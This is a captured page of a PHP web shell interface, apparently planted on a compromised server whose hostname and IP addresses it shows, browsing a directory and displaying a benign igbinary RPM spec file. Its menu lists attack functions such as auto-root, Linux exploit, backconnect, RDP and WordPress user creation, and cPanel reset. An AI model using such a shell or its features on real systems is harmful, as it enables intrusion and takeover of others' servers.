Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.28
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
remi /
php56 /
root /
usr /
share /
doc /
pecl /
igbinary /
[ HOME SHELL ]
Name
Size
Permission
Action
CREDITS
549
B
-rw-r--r--
NEWS
3.54
KB
-rw-r--r--
README.md
5.8
KB
-rw-r--r--
igbinary.php
3.46
KB
-rw-r--r--
igbinary.php.ini
136
B
-rw-r--r--
igbinary.spec
1.57
KB
-rw-r--r--
tags.sh
211
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : igbinary.spec
# Define version and release number %define version 1.0.2 %define release 1 Name: php-igbinary Version: %{version} Release: %{release}%{?dist} Packager: Mikko Koppanen <mikko@ibuildings.com> Summary: PHP igbinary extension License: PHP Style License (http://opensource.dynamoid.com/#license) Group: Web/Applications URL: http://opensource.dynamoid.com/ # pear package creates .tgz file and the original source was .tar.gz Source: http://opensource.dynamoid.com/igbinary-%{version}.tgz Prefix: %{_prefix} Buildroot: %{_tmppath}/%{name}-%{version}-%{release}-root BuildRequires: php-devel, make, gcc, /usr/bin/phpize %description Igbinary is a drop in replacement for the standard PHP serializer. Instead of time and space consuming textual representation, igbinary stores PHP data structures in a compact binary form. %prep %setup -q -n igbinary-%{version} %build /usr/bin/phpize && %configure && %{__make} %{?_smp_mflags} # Clean the buildroot so that it does not contain any stuff from previous builds [ "%{buildroot}" != "/" ] && %{__rm} -rf %{buildroot} # Install the extension %{__make} install INSTALL_ROOT=%{buildroot} # Create the ini location %{__mkdir} -p %{buildroot}/etc/php.d # Preliminary extension ini echo "extension=igbinary.so" > %{buildroot}/%{_sysconfdir}/php.d/igbinary.ini %clean [ "%{buildroot}" != "/" ] && %{__rm} -rf %{buildroot} %files %{_libdir}/php/modules/igbinary.so %{_sysconfdir}/php.d/igbinary.ini %{_includedir}/php/ext/igbinary/igbinary.h %changelog * Fri Oct 02 2009 Mikko Koppanen <mikko@ibuildings.com> - Initial spec file
Close